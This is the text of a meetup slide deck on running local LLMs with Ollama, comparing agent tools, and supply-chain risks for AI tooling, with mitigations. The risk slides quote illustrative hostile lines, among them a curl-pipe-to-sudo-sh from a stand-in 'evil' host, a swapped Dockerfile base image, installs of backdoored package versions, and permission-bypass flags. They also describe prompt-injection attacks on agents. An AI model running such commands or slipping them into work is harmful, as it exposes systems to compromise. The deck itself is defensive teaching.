π¦
Local LLMs,
Agent Tools &
Supply Chain Nightmares
Manuel Gaar Β· PreciPoint AI Meetup Β· May 2026
or: what happens when your autocomplete gets sudo fnord
π
00 Β· Agenda
- Part 1 β Why local? Ollama, my rig, and the model zoo
- Part 2 β Agent tools, local agents (OpenClaw vs Hermes), cloud agents, and the *.md config chaos
- Part 3 β Supply chain nightmares, YOLO flags, and real-world incidents
- Part 4 β Mitigations, vibe coding with git, agent isolation, and live demo
π
Why local?
- Data stays on your machine β as long as it has no shell or tool access
- No API costs, no rate limits, no "please upgrade to Pro"
- Works offline β air-gapped deployments, no cloud dependency
- You can fine-tune without selling your soul (or data) to a cloud provider
But "local" doesn't mean "safe":
- A local LLM can read every file your user can read
- Agent tools give it
curl, ssh, access to internal APIs
- It sits inside your network β behind the firewall
- Think: intern with root access and no supervision
π¦
Ollama β LLMs as a service, but localhost
$ curl -fsSL https://ollama.com/install.sh | sh
$ ollama pull qwen3.5:9b
$ ollama pull gemma4:12b
$ ollama run qwen3.5:9b
$ curl http://localhost:11434/v1/chat/completions \
-d '{"model":"qwen3.5:9b","messages":[{"role":"user","content":"explain WebRTC in 3 sentences"}]}'
π₯οΈ
My Rig β AMD all the way
- CPU: AMD Ryzen 7 5800X
- RAM: 64 GB DDR4
- GPU: Radeon RX 6800 XT (16 GB VRAM)
- ROCm: natively supported (gfx1030 / RDNA 2)
- Runs Qwen 3.5:9B and Gemma 4:12B comfortably
OLLAMA_HOST = 127.0.0.1
OLLAMA_FLASH_ATTENTION = 1
OLLAMA_GPU_OVERHEAD = 0
OLLAMA_API_KEY = d3b3a9****...****OUMad
HSA_OVERRIDE_GFX_VERSION = 10.3.0
ROCR_VISIBLE_DEVICES = 0
phife at phife-pc in ~
$ ollama ps
NAME ID SIZE PROCESSOR CONTEXT UNTIL
gemma4:latest c6eb396dbd59 13 GB 100% GPU 131072 5 minutes from now
13 GB model fits entirely in 16 GB VRAM β no CPU offload needed.
π
The Model Zoo
Qwen 3 (8B)
Alibaba's powerhouse. Great coding, multilingual, tool-calling built in. Runs on 8GB VRAM.
OSSLocal
Gemma 4 (12B)
Google's latest. Multimodal, strong reasoning, surprisingly good at agentic tasks.
OSSLocal
MiniMax M2.5
Chinese dark horse. 10B active params, 230B total MoE. Fastest-climbing on OpenRouter. Strong at agentic coding and tool use.
OSSCloud*
GPT-OSS (OpenAI)
OpenAI's first open weights since GPT-2. 20B runs on 16GB RAM. Native tool calling, MXFP4 quantized. Apache 2.0.
OSSLocal
* MiniMax M2.5 available via Ollama cloud or self-hosted with serious hardware
π οΈ
Agent Tools β making LLMs do things
An LLM alone is just a fancy autocomplete. Agent frameworks give it:
- Tool calling β run shell commands, read files, call APIs
- Planning β break tasks into steps, iterate
- Memory β context across sessions
- Guardrails β so it doesn't
rm -rf / your prod server
(the guardrails part is... a work in progress)
π€
Local Agent Stack
OpenClaw / PicoClaw
Created by Peter Steinberger (Austria, ex-PSPDFKit). Now at OpenAI. Project moved to an open-source foundation. 247k+ GitHub stars.
- OSS coding agent inspired by Claude Code
- PicoClaw β minimal fork, runs on a Raspberry Pi
- Focused on code: file editing, git, tests, commits
- No built-in memory β add and maintain it yourself
- Sandboxing available but needs manual setup
- Browser & web search via skills/MCP
- Messaging: Telegram, Discord, Slack, WhatsApp, iMessage
- TTS, STT, image gen available via MCP servers / ClawHub skills β not built-in
- Local Ollama models or cloud providers via API key
- Complex and heavyweight β ~500 MB RAM for the gateway alone, no LLM loaded
Hermes Agent (NousResearch)
Built by Nous Research (US, $70M funded). Founded by Jeff Quesnelle, Karan Malhotra & Teknium. 50k+ GitHub stars in 46 days.
- Full agentic platform, not just a coding tool
- 3-layer memory: MEMORY.md + USER.md (system prompt), SQLite FTS5 session search, pluggable providers (Mem0, Hindsight, etc.)
- Learns reusable skills from completed tasks
- Native Docker isolation with one config line
- Dangerous command approval system built in
- Built-in browser automation, web search & extraction
- Gateway: Telegram, Discord, Slack, WhatsApp, Signal, Email
- TTS (9 providers incl. Edge, ElevenLabs, OpenAI, MiniMax)
- STT via local Whisper, Groq, OpenAI, or Mistral Voxtral
- Image generation via FAL.ai (8 models incl. FLUX 2, GPT-Image)
- Local Ollama models or cloud providers via API key
βοΈ
The Cloud Contenders
Claude Code
Anthropic's terminal agent. Reads your repo, edits files, runs tests. Scarily competent.
CloudClosed
β Best code quality (subjective!)
Codex (OpenAI)
OpenAI's answer to Claude Code. Multi-file editing, sandboxed execution.
CloudClosed
β‘ Sandboxed by default
Gemini CLI
Google's entry. Free tier generous. Works with Gemma locally too. Google-scale search built in.
CloudFree tier
π Grounding with Search
βοΈ
Local vs Cloud β the honest truth
Local (Ollama + OpenClaw)
- β
Full data sovereignty
- β
No API costs
- β
Works offline / air-gapped
- β Smaller models = less capable
- β Your GPU, your electricity bill
- β Limited context window on smaller models
Cloud (Claude Code et al.)
- β
Frontier model intelligence
- β
Web search, MCP, integrations
- β
Zero infra management
- β Data leaves your machine
- β Costs add up fast
- β Rate limits at the worst moment
"Localhost is lava β until you realize the cloud is someone else's localhost." β the eternal DevOps koan
π
The *.md file landscape
every tool invented its own config format β in markdown
- CLAUDE.md β Claude Code project context
- AGENTS.md β Linux Foundation "universal" standard
- GEMINI.md β Google Gemini CLI
- SOUL.md β Hermes agent persona & personality
- MEMORY.md / USER.md β Hermes persistent memory
- SKILL.md β portable agent skills (Claude, Codex, Hermes). OpenClaw has ClawHub β npm for agent skills, 15k+ published
copilot-instructions.md β GitHub Copilot
- β¦and
.cursorrules, .windsurfrules, JULES.md, and counting
The problem: same content, 10 different files, slowly drifting apart in every repo.
The workaround:
$ ln -sfn AGENTS.md .github/copilot-instructions.md
$ ln -sfn AGENTS.md .cursor/rules/main.mdc
The bet: AGENTS.md becomes the README.md of agent config. Not because it's best β because Linux Foundation gravity wins.
Standards are great. That's why we have so many of them. fnord
π
Now the scary part
Supply Chain Attacks on AI Tooling
Remember event-stream? Remember colors.js?
March 2026: LiteLLM β the most popular LLM proxy on PyPI (95M downloads/month) β was backdoored for 5 hours. Credential harvester, K8s lateral movement, persistent backdoor. The attack started with a compromised security scanner.
"Your vulnerability scanner stole the token that backdoored your AI gateway."
π―
Attack Vectors
Malicious Model
β
ollama pull
β
Agent Framework
β
shell access
β
π game over
- Typosquatting on Ollama Hub β
llama4 vs lIama4 vs 1lama4
- Poisoned image uploads β images with embedded prompt injection instructions that hijack multimodal agents
- CI/CD credential cascades β TeamPCP: compromised Trivy β npm (CanisterWorm) β PyPI (LiteLLM) β 5 ecosystems in one week
- Prompt injection via model weights β model trained to inject malicious tool calls
- Malicious agent skills β ClawHub had 15k+ skills, 2,400 removed after the ClawHavoc incident. A SKILL.md can exfiltrate secrets or silently bias recommendations
- MCP server compromise β your agent trusts the tool server implicitly
π₯
This is not hypothetical
LiteLLM β PyPI backdoor
March 24, 2026. TeamPCP compromised Trivy, stole a PyPI token, and backdoored LiteLLM.
pip install litellm==1.82.8
A .pth file fired on every Python startup β no import needed. Harvested SSH keys, cloud creds, K8s secrets. Deployed privileged pods to every node.
Axios β npm hijack
March 31, 2026. Compromised maintainer account. Malicious versions published to both latest and legacy tags.
npm install axios@1.14.1
Cross-platform RAT deployed in under 15 seconds. 100M weekly downloads. North Korean state actor (Sapphire Sleet).
npm typosquatting
Ongoing forever. One typo, one crypto miner. 454k malicious packages published to npm in 2025 alone.
npm install olama β not ollama
The "helpful" agent
"I'll fix your Dockerfile." Agent quietly swaps in:
FROM evil-registry.io/totally-legit-ubuntu:latest
You approve the diff without reading it. Classic.
curl | sh β we all do it
curl -fsSL https://install.evil.ai | sudo sh
π£
The YOLO Bomb Shell Flags
every cloud agent ships a "please delete my career" flag
$ claude --dangerously-skip-permissions
$ codex --dangerously-bypass-approvals-and-sandbox
$ gemini --yolo
All three agents can read your files, run shell commands, and call APIs. These flags remove the only thing standing between the LLM and sudo rm -rf /.
YOLO β You Only Live Once. Which is exactly how many times you'll run rm -rf ~/ before learning your lesson. fnord
π‘οΈ
Mitigations β what you can actually do
- Pin model digests β
ollama pull qwen3:8b@sha256:abc...
- Run agents in containers β limit blast radius
- Network isolation β agents don't need internet access (usually)
- Review tool calls β human-in-the-loop for destructive ops
- Use safetensors format β no pickle, no arbitrary code exec
- Audit your MCP servers β they're just HTTP endpoints
- Vet agent skills before installing β a SKILL.md is executable influence, treat it like a shell script
- Lock file everything β npm lockfile, pip freeze, Ansible pin
Every pip install is a mass CVE generator. Every ollama pull is a trust exercise. Every SKILL.md is a shell script in a trenchcoat. fnord
πΏ
Vibe Coding + Git
Without git
- Agent rewrites files you didn't ask it to touch
- "Small refactor" cascades across 15 files
- YOLO flag deletes something you can't recover
- You approve diffs without reading them
With git
- Commit before every agent session
- Feature branches only β agents never touch main
git diff before every commit
git reset --hard when it all goes wrong
How each agent handles it
Claude Code
Auto checkpoints before every change. Esc+Esc rollback. Refuses force-push to main. Auto-commit via PostToolUse hooks.
Hermes
Built-in checkpoints + /rollback command. Git worktree isolation via -w flag. Per-file restore supported.
OpenClaw
No built-in git safety. Bring your own discipline, your own hooks, your own branch strategy.
Git is not optional in the age of AI agents. It's the seatbelt. fnord
π
Agent Isolation β config compared
Hermes β 5 lines
terminal:
backend: docker
persistent_shell: true
timeout: 180
approvals:
mode: manual
Read-only root FS, dropped capabilities, namespace isolation β all handled automatically.
OpenClaw β a bit more involved
"agents": { "defaults": {
"sandbox": {
"mode": "all",
"backend": "docker",
"scope": "session",
"workspaceAccess": "rw"
}
}}
Sandbox off by default. Network isolated by default. Three permission gates to align manually.
πͺ
Live Demo
if the demo gods are merciful today
Demo 1 β OpenClaw
- Ollama + Qwen 3.5:9B
- OpenClaw in the browser
- Code editing task
Demo 2 β Hermes
- Ollama + Gemma 4:latest
- Hermes via shell tool
- Same task, different approach
Then: side-by-side with Claude Code on the same task. Spot the difference.
π§
TL;DR
The stack
- Local LLMs are ready for daily use β often more practical than reaching for a cloud model
- Cloud agents are still king for complex refactors and reasoning
- The best setup is hybrid β local for speed and privacy, cloud for heavy lifting
- Money, API access, and hardware are the cheatcode. But nothing has really changed, same gold rush energy as the early internet days or when crypto came out
The risks
- Supply chain security is the next frontier. Treat model pulls like Docker pulls or checking emails for phishing
- Frontier models are more likely to be safe than open-source models. No model is audited anyway, especially not the small ones
- Breaking changes are the new normal. Expect them weekly, not quarterly
- Security incidents are more frequent, more cascaded, and hit harder than ever
Working with AI agents β lessons learned
- Always read the response and the tool calls carefully β not just the summary
- Reducing context helps β shorter prompts, focused sessions, fresh conversations
- "Don't" directives work surprisingly well β tell the model what to avoid, not just what to do
- The pace is insane β agents get vibe-coded updates almost daily, every commit is a release, the tooling you learned last week is already outdated
π§
How this was built
- Claude Pro subscription β Anthropic's consumer plan
- Claude Opus 4.6 β frontier model, not a local lightweight
- Claude Code β running natively in a Debian WSL shell, isolated workspace
- Manuel in the loop β every slide reviewed, corrected, and iterated on by a human
No PowerPoint, no framework, no browser IDE. Just Claude Code in a terminal, a frontier model, and a human who kept saying "no, rephrase that."
- ~50 turns of back-and-forth
- ~1.1M tokens consumed (AI estimation^^)
- 2x daily rate limit hit
- ~4 hours including research
- Web search for every technical claim
- 22 slides, ~1000 lines of HTML/CSS/JS
- Zero npm/pip dependencies
The model wrote the code. The human steered the content. Neither would have finished alone.
π‘
Links & Resources
Questions?
(or complaints about this not being PowerPoint)
No models were audited. No SKILL.md was reviewed. YOLO.
No Raspberry Pis, Hetzner VMs, or open-source models were harmed during this exploration. fnord
Disclaimer: this presentation is most likely outdated by the time you watch it. That's the point.